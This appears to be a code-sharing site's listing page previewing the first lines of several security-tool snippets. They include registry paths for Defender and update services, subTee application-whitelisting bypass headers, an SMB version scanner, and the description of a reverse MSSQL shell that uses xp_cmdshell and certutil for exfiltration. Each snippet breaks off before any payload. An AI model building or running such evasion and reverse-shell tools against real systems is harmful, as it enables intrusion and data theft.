This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"Top 1000 values of registry.path",Count | |
"HKLM\SYSTEM\ControlSet001\Services\WinDefend\Start","1,483" | |
"HKLM\SYSTEM\ControlSet001\Services\UsoSvc\Start","1,477" | |
"HKLM\SYSTEM\ControlSet001\Services\WaaSMedicSvc\Start","1,477" | |
"HKLM\SYSTEM\ControlSet001\Services\wuauserv\Start","1,477" | |
"HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService\Start",6 | |
"HKLM\SYSTEM\ControlSet001\Services\Sense\Start",6 | |
"HKLM\SYSTEM\ControlSet001\Services\WdBoot\Start",6 | |
"HKLM\SYSTEM\ControlSet001\Services\WdFilter\Start",6 | |
"HKLM\SYSTEM\ControlSet001\Services\WdNisDrv\Start",6 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# set -x | |
if [[ $EUID -ne 0 ]]; then | |
echo "You must be root to run this script" | |
exit 1 | |
fi | |
# Returns all available interfaces, except "lo" and "veth*". |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class Main { | |
public static void main(String[] argv) throws Exception { | |
System.out.println("Keystore: " + argv[0]); | |
System.out.println("Keystore Password: " + argv[1]); | |
System.out.println("Key Password: " + argv[1]); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
''' | |
This is a make-shift replacement for metasploit's auxiliary/scanner/smb_version for clients that have disabled/removed | |
SMBv1. This grabs the hostname, domain name, and Windows version from the NTLMv2 challenge response | |
@Quickbreach | |
''' | |
import argparse |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-16"?> | |
<Answers Version="1.0"> | |
<Interaction ID="IT_LaunchMethod"> | |
<Value>ContextMenu</Value> | |
</Interaction> | |
<Interaction ID="IT_SelectProgram"> | |
<Value>NotListed</Value> | |
</Interaction> | |
<Interaction ID="IT_BrowseForFile"> | |
<Value>C:\Windows\assembly\Exec-Execute.msi</Value> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
mail_address = '' | |
password = '' | |
from selenium import webdriver | |
UA = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0' | |
PHANTOMJS_ARG = {'phantomjs.page.settings.userAgent': UA} | |
driver = webdriver.PhantomJS(desired_capabilities=PHANTOMJS_ARG) | |
url = 'https://www.google.com/accounts/Login?hl=ja&continue=http://www.google.co.jp/' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import requests | |
import threading | |
import HTMLParser | |
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
''' | |
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
Author: @xassiz | |
''' |
NewerOlder